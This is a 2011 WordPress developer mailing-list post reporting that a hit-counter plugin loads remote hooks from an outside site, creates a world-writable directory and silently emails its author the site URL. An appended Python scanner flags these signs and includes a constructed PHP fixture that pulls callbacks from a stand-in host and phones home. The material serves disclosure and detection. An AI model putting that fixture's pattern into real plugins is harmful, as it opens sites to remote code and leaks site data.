[wp-hackers] Hookd? Sketchy Plugin Include

Jackson Whelan jw at jacksonwhelan.com
Tue Sep 13 22:28:01 UTC 2011


Howdy,

Trying to help someone in the forums complaining about a plugin 
(http://wordpress.org/extend/plugins/hit-counter-ultimate/) causing 
their site to crawl, and stumbled across this included file which looks 
like it could be used for great malfeasance.

     
http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/class.resource.php

Makes calls to hookd.org and requests actions and filters to be added. 
Creates a world-writable directory while it's at it as well.

Is anyone familiar with hookd.org? Am I paranoid for thinking this is 
dubious?

As a bonus the plugin emails the author with the URL of the site it was 
activated on, with no user consent or knowledge.

     http://plugins.svn.wordpress.org/hit-counter-ultimate/trunk/image.php

Which would make sense as it would allow them to fine-tune the junk they 
deploy.

I found this related post in the forums from a year ago.

     http://wordpress.org/support/topic/my-site-hacked?replies=14

I've already emailed plugins at wordpress.org, but thought I'd ask if 
anyone here was aware of this.

No comment on hit counters being used in 2011, but if you'd like to step 
into the wayback machine just look at the screenshots : )

Thanks! Jackson
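One defensive check a reviewer could run over plugin sources before reading them line by line, as an added example that is not part of the original post or of the plugin: a small Python triage scanner for the indicators described above (outbound calls to a host outside an allow-list, hook names taken from runtime data rather than literals, a 0777 directory, and a mail call that carries the site URL). The PHP it scans is constructed to exhibit those patterns and is not the plugin's code; the allow-list, the placeholder host names and the rule names are assumptions.

```python
"""Static triage scan for the indicators described in the post.

Added example (not the plugin's or the list's code): a heuristic scanner that
flags, in PHP plugin sources, (1) URLs pointing at hosts outside an allow-list,
(2) add_action/add_filter calls whose hook name comes from a variable, i.e.
from runtime data such as a remote response, (3) mkdir/chmod with mode 0777,
and (4) a mail call whose arguments include the site URL (a phone-home).
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Assumed allow-list: hosts a plugin legitimately contacts. Anything else is reported.
ALLOWED_HOSTS = {"wordpress.org", "api.wordpress.org", "downloads.wordpress.org"}


@dataclass(frozen=True)
class Finding:
    line: int    # 1-based line in the scanned source
    rule: str    # which indicator fired
    detail: str  # the matched host or source fragment


URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
WORLD_WRITABLE_RE = re.compile(r"\b(?:mkdir|chmod)\s*\([^;]*?\b0?777\b")
DYNAMIC_HOOK_RE = re.compile(r"\badd_(?:action|filter)\s*\(\s*\$")
MAIL_CALL_RE = re.compile(r"\b(?:wp_mail|mail)\s*\(")
SITE_URL_RE = re.compile(
    r"get_bloginfo\s*\(\s*['\"](?:url|wpurl|home)['\"]"
    r"|\b(?:site_url|home_url)\s*\("
    r"|\$_SERVER\s*\[\s*['\"]HTTP_HOST"
)


def _line_of(text: str, pos: int) -> int:
    return text.count("\n", 0, pos) + 1


def scan_source(text: str, allowed_hosts: Iterable[str] = ALLOWED_HOSTS) -> List[Finding]:
    """Return findings sorted by line; an empty list means no indicator fired."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for m in URL_RE.finditer(text):
        host = m.group(1).lower()
        if host not in allowed:
            findings.append(Finding(_line_of(text, m.start()), "external-host", host))
    for m in WORLD_WRITABLE_RE.finditer(text):
        findings.append(Finding(_line_of(text, m.start()), "world-writable", m.group(0)))
    for m in DYNAMIC_HOOK_RE.finditer(text):
        findings.append(Finding(_line_of(text, m.start()), "dynamic-hook", m.group(0)))
    for m in MAIL_CALL_RE.finditer(text):
        # Inspect the whole statement (up to ';') so multi-line argument lists are covered.
        end = text.find(";", m.end())
        stmt = text[m.start():end if end != -1 else len(text)]
        if SITE_URL_RE.search(stmt):
            findings.append(Finding(_line_of(text, m.start()), "phone-home", stmt.splitlines()[0]))
    return sorted(findings, key=lambda f: (f.line, f.rule))


# Constructed PHP exhibiting the reported patterns; NOT the plugin's actual source.
SUSPICIOUS_SAMPLE = """<?php
// Constructed sample illustrating the reported indicators; not the plugin's code.
$resp = wp_remote_get('http://hooks.example.invalid/feed.php');
$remote = json_decode(wp_remote_retrieve_body($resp), true);
foreach ($remote['actions'] as $hook => $cb) {
    add_action($hook, $cb);
}
$dir = WP_CONTENT_DIR . '/uploads/hcu';
if (!is_dir($dir)) {
    mkdir($dir, 0777, true);
}
wp_mail('author@example.invalid', 'plugin activated', get_bloginfo('url'));
add_action('init', 'hcu_init');
"""

# Constructed benign plugin fragment for comparison: literal hook, allowed host, 0755.
BENIGN_SAMPLE = """<?php
add_action('init', 'my_init');
$resp = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/');
mkdir($dir, 0755, true);
"""

if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, [(f.line, f.rule, f.detail) for f in scan_source(src)])
```

This is a triage heuristic, not a verdict: a literal hook name registered to a callback that itself evaluates remote data would slip past the dynamic-hook rule, so a hit on any rule is a reason to read the file, and a clean result is not a reason to skip it.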

